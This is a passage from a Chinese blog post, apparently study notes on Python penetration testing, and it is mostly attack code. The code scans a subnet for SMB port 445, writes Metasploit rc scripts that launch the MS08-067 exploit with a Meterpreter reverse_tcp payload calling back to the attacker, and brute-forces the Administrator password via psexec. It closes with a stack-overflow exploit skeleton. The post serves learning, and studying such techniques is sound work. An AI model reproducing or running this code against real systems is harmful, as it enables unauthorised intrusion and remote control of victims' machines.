    <span class="n">nm_scan</span> <span class="o">=</span> <span class="n">nmap</span><span class="p">.</span><span class="n">PortScanner</span><span class="p">()</span>
    <span class="n">nm_scan</span><span class="p">.</span><span class="n">scan</span><span class="p">(</span><span class="n">sub_net</span><span class="p">,</span> <span class="s">"445"</span><span class="p">)</span>
    <span class="n">target_hosts</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">host</span> <span class="ow">in</span> <span class="n">nm_scan</span><span class="p">.</span><span class="n">all_hosts</span><span class="p">():</span>
        <span class="k">if</span> <span class="n">nm_scan</span><span class="p">[</span><span class="n">host</span><span class="p">].</span><span class="n">has_tcp</span><span class="p">(</span><span class="mi">445</span><span class="p">):</span>
            <span class="n">state</span> <span class="o">=</span> <span class="n">nm_scan</span><span class="p">[</span><span class="n">host</span><span class="p">][</span><span class="s">"tcp"</span><span class="p">][</span><span class="mi">445</span><span class="p">][</span><span class="s">"state"</span><span class="p">]</span>
            <span class="k">if</span> <span class="n">state</span> <span class="o">==</span> <span class="s">"open"</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found Target Host: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">host</span><span class="p">))</span>
	<span class="k">return</span> <span class="n">target_hosts</span>
</code></pre></div></div>

<p>接下来需要编写一个监听器，这个监听器或称命令与控制信道，用于与目标主机进行远程交互</p>

<p>Metasploit 提供了一个 Meterpreter 的高级动态负载，当 Meterpreter 进程回连接到攻击者的计算机等候执行进一步的命令时，要使用一个名为 <code class="language-plaintext highlighter-rouge">multi/handler</code> 的 Metasploit 模块去发布命令。接下来需要把各条指令写入 Metasploit 的 rc 脚本中</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">setup_handler</span><span class="p">(</span><span class="n">config_file</span><span class="p">,</span> <span class="n">lhost</span><span class="p">,</span> <span class="n">lport</span><span class="p">):</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"use exploit/multi/handler</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set PAYLOAD windows/meterpreter/reverse_tcp</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set LPORT {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lport</span><span class="p">))</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set LHOST {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lhost</span><span class="p">))</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"exploit -j -z</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"setg DisablePayloadHandler 1</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
</code></pre></div></div>

<p>注意脚本发送了一条指令：在同一个任务（job）的上下文环境中（-j），不与任务进行即时交互的条件下（-z）利用目标计算机上的漏洞</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">conficker_exploit</span><span class="p">(</span><span class="n">config_file</span><span class="p">,</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">lhost</span><span class="p">,</span> <span class="n">lport</span><span class="p">):</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"use exploit/windows/smb/ms08_067_netapi</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set RHOST {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_host</span><span class="p">))</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set PAYLOAD windows/meterpreter/reverse_tcp</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set LPORT {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lport</span><span class="p">))</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set LHOST {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lhost</span><span class="p">))</span>
    <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"exploit -j -z</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="暴力破解口令远程执行一个进程">暴力破解口令，远程执行一个进程</h3>

<p>需要用暴力攻击的方式破解 SMB 用户名/密码，以此获取权限在目标主机上远程执行一个进程（psexec）</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">smb_brute</span><span class="p">(</span><span class="n">config_file</span><span class="p">,</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">passwd_file</span><span class="p">,</span> <span class="n">lhost</span><span class="p">,</span> <span class="n">lport</span><span class="p">):</span>
    <span class="n">username</span> <span class="o">=</span> <span class="s">"Administrator"</span>
    <span class="n">pf</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">passwd_file</span><span class="p">,</span> <span class="s">"r"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">password</span> <span class="ow">in</span> <span class="n">pf</span><span class="p">.</span><span class="n">readlines</span><span class="p">():</span>
        <span class="n">password</span> <span class="o">=</span> <span class="n">password</span><span class="p">.</span><span class="n">strip</span><span class="p">(</span><span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">)</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"use exploit/windows/smb/psexec</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set SMBUser {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">username</span><span class="p">))</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set SMBPass {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">password</span><span class="p">))</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set RHOST {}</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set PAYLOAD windows/meterpreter/reverse_tcp</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set LPORT {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lport</span><span class="p">))</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"set LHOST {}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lhost</span><span class="p">))</span>
        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"exploit -j -z</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="整合">整合</h3>

<p>最主要的是 main 函数如何与 metasploit 交互，发现是通过 rc 文件</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">config_file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">"meta.rc"</span><span class="p">,</span> <span class="s">"w"</span><span class="p">)</span>
<span class="p">...</span>
<span class="n">os</span><span class="p">.</span><span class="n">system</span><span class="p">(</span><span class="s">"msfconsole -r meta.rc"</span><span class="p">)</span>
</code></pre></div></div>

<h2 id="编写你自己的-0day-概念验证代码">编写你自己的 0day 概念验证代码</h2>

<p>Morris 蠕虫成功的原因在某种程度上其实就是利用了 Finger service 中的一个基于栈的缓冲区溢出</p>

<h3 id="基于栈的缓冲区溢出攻击">基于栈的缓冲区溢出攻击</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">shellcode</span> <span class="o">=</span> <span class="p">(</span><span class="s">"</span><span class="se">\xbf\x5c</span><span class="s">...."</span><span class="p">)</span>
<span class="n">overflow</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x41</span><span class="s">"</span> <span class="o">*</span> <span class="mi">246</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"&lt;L"</span><span class="p">,</span> <span class="mh">0x7c874413</span><span class="p">)</span>
<span class="n">padding</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span> <span class="o">*</span> <span class="mi">150</span>
<span class="n">crash</span> <span class="o">=</span> <span class="n">overflow</span> <span class="o">+</span> <span class="n">ret</span> <span class="o">+</span> <span class="n">padding</span> <span class="o">+</span> <span class="n">shellcode</span>
</code></pre></div></div>

<h3 id="发送漏洞利用代码">发送漏洞利用代码</h3>

<p>使用 <code class="language-plaintext highlighter-rouge">Berkeley Socket API</code> 发送，其实就是套接字发送，之前在学校课程已经接触过了，不记录了</p>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="cybersecurity" /><category term="penetration testing" /><summary type="html"><![CDATA[用 Python 进行渗透测试]]></summary></entry></feed>